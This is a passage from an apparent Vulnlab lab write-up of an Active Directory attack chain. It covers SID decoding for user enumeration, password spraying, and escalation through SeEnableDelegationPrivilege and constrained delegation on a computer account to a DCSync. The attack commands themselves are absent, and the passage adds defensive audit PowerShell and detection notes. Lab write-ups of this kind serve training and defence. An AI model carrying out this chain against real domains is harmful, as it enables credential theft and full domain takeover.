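    $domainSid = $null
    if ($count -ge 2) { $domainSid = "S-$revision-$authority-" + ($subs[0..($count - 2)] -join '-') }
    [PSCustomObject]@{
        Sid         = $sid
        DomainSid   = $domainSid
        Rid         = $subs[-1]
        DomainBytes = 8 + 4 * ($count - 1)                    # 24 for a normal domain SID, i.e. 48 hex chars
    }
}

function ConvertTo-SidHex {
    # Inverse: domain SID string plus RID to the hex form MSSQL expects, for round-trip checks.
    param([Parameter(Mandatory)][string]$DomainSid, [Parameter(Mandatory)][uint32]$Rid)
    $sid = [System.Security.Principal.SecurityIdentifier]::new("$DomainSid-$Rid")
    $bytes = [byte[]]::new($sid.BinaryLength)
    $sid.GetBinaryForm($bytes, 0)
    '0x' + (($bytes | ForEach-Object { $_.ToString('X2') }) -join '')
}

# Constructed sample: the Outdated domain SID from earlier on this page with RID 512 (Domain Admins).
$sample = '0x010500000000000515000000F410C3F3FB6A0804E99167EF00020000'
$parsed = ConvertFrom-SidHex -Hex $sample
$parsed | Format-List
# Round trip: re-encode the domain SID and RID and compare with the input.
$again = ConvertTo-SidHex -DomainSid $parsed.DomainSid -Rid $parsed.Rid
"round trip ok: $($again -eq $sample)"
```

From the defender’s side, the SID-to-name lookups this enables (SUSER_SNAME over a range of RIDs) are visible as a burst of queries from one low-privileged SQL login; restricting guest logins on the instance removes the vantage point the text uses.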
Getting a Foothold
Now that we have a list of users, we can spray the password scheme that we learned about earlier against those users:
This leads to our first domain user credentials. At this point we can do a lot more enumeration like for example checking shares authenticated and gathering bloodhound data. First we gather bloodhound data:
After loading it into bloodhound, we notice that there is a path to high value targets from our user:
To change the password of that user, we can use the following command:
This gives us a shell on the domain controller and our first flag.
Privilege Escalation
First we check our privileges and notice that this user has SeEnableDelegationPrivilege, which means the user can enable delegation on accounts in the domain.
This is a dangerous privilege that allows escalating privileges in multiple ways. Let’s take this opportunity to recall the three types of delegation:
Unconstrained Delegation: A machine configured with Unconstrained Delegation will store the TGT of any user connecting to it in memory. This allows the machine to then impersonate that user. To configure this, the userAccountControl attribute of the machine gets modified to include the TRUSTED_FOR_DELEGATION flag (which requires the SeEnableDelegationPrivilege domain privilege).
Constrained Delegation: A machine configured with Constrained Delegation will be able to impersonate any user against another machine. To configure this, the userAccountControl attribute of the object gets modified to include the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag (which requires the SeEnableDelegationPrivilege privilege) and the msDS-AllowedToDelegateTo attribute gets set to the target SPN that we want to authenticate against as any user.
Resource-Based Constrained Delegation: A machine configured with Resource-Based Constrained Delegation will trust another account to impersonate any user on itself. To configure this, the msDS-AllowedToActOnBehalfOfOtherIdentity attribute must be set to a security descriptor containing the SID of the object that is allowed to delegate to it. This does not require SeEnableDelegationPrivilege, and the machine can modify it on itself.
So in other words, RBCD is a privilege given by a machine account on itself and does not require any special privileges, while both Unconstrained and Constrained Delegation do require the SeEnableDelegationPrivilege, because those affect other resources in the domain.
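The three configurations just described can be audited from the attributes they are stored in. The following PowerShell is an added example (not code from this page or from Vulnlab) that queries every object carrying any of them, decodes the two userAccountControl bits named above (TRUSTED_FOR_DELEGATION = 0x80000, TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000) and, for RBCD, reads the principals out of the security descriptor. It assumes the RSAT ActiveDirectory module on a domain-joined host; the attribute and flag names are the real ones, the output column names are my own.

```powershell
Import-Module ActiveDirectory

# userAccountControl bits named in the text above.
$TRUSTED_FOR_DELEGATION         = 0x0080000   # unconstrained
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained with protocol transition (any user)

function Get-DelegationAudit {
    # One row per account that carries any delegation configuration, with the kind decoded
    # from userAccountControl and the two msDS-* delegation attributes.
    $filter = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
              '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' +
              '(msDS-AllowedToDelegateTo=*)' +
              '(msDS-AllowedToActOnBehalfOfOtherIdentity=*))'
    $props = 'userAccountControl', 'msDS-AllowedToDelegateTo',
             'msDS-AllowedToActOnBehalfOfOtherIdentity', 'servicePrincipalName'

    Get-ADObject -LDAPFilter $filter -Properties $props | ForEach-Object {
        $uac   = [int]$_.userAccountControl
        $kinds = @()
        if ($uac -band $TRUSTED_FOR_DELEGATION) { $kinds += 'Unconstrained' }
        if ($_.'msDS-AllowedToDelegateTo') {
            $mode = if ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) { 'Constrained (protocol transition)' } else { 'Constrained (Kerberos only)' }
            $kinds += $mode
        }
        $rbcdFrom = @()
        $raw = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        if ($raw) {
            $kinds += 'RBCD'
            # The attribute is a security descriptor; its DACL lists who may delegate to this object.
            if ($raw -is [System.DirectoryServices.ActiveDirectorySecurity]) {
                $sd = $raw
            } else {
                $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
                $sd.SetSecurityDescriptorBinaryForm([byte[]]$raw)
            }
            $rbcdFrom = @($sd.Access | ForEach-Object { $_.IdentityReference.Value })
        }
        [PSCustomObject]@{
            Name        = $_.Name
            Class       = $_.ObjectClass
            Delegation  = $kinds -join ', '
            DelegateTo  = @($_.'msDS-AllowedToDelegateTo') -join ', '
            RbcdAllowed = $rbcdFrom -join ', '
        }
    }
}

Get-DelegationAudit | Sort-Object Delegation | Format-Table -AutoSize
```

Domain controllers show up as Unconstrained by design; any other unconstrained host, any constrained entry whose DelegateTo names an LDAP or CIFS SPN on a domain controller, and any RBCD entry naming an account nobody recognises are the rows to investigate. SeEnableDelegationPrivilege itself is not an LDAP attribute: it is the user right "Enable computer and user accounts to be trusted for delegation", assigned through the Default Domain Controllers Policy, so review that GPO alongside this output, and keep privileged accounts out of reach of all three mechanisms with the "Account is sensitive and cannot be delegated" flag or the Protected Users group.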
With this information, we can rule out RBCD and focus on the other two. As seen on the predecessor machine “Delegate”, we could add a machine account, configure it with unconstrained delegation and then coerce the domain controller to authenticate to that machine. This would require the ability to add machine accounts and also to add DNS entries (for the coercion; Kerberos works with names rather than IP addresses). Neither is possible in this case, since the environment has been hardened.
This leaves us with Constrained Delegation, which does not require a new DNS entry. It does, however, still require control of a machine account. Luckily, in this case the user helen.frost has GenericAll privileges on a computer object called FS01$. This allows us to reset the password of that computer object (alternatively, Shadow Credentials could be used if a CA were configured):
Additionally, we need to use our SeEnableDelegationPrivilege to make the necessary changes:
As described earlier, we set msDS-AllowedToDelegateTo to the resource we want to control (LDAP on the domain controller, in order to perform a DCSync) and the TrustedToAuthForDelegation flag.
Now we can use the credentials of the FS01$ machine account to request a service ticket for the DC as any user (here the DC computer account itself):
Since this is a ticket for LDAP, it allows us to perform a DCSync:
With the admin hash we can now connect to the DC and read the final flag. If you want to try out the machine, join Vulnlab 🙂
Resources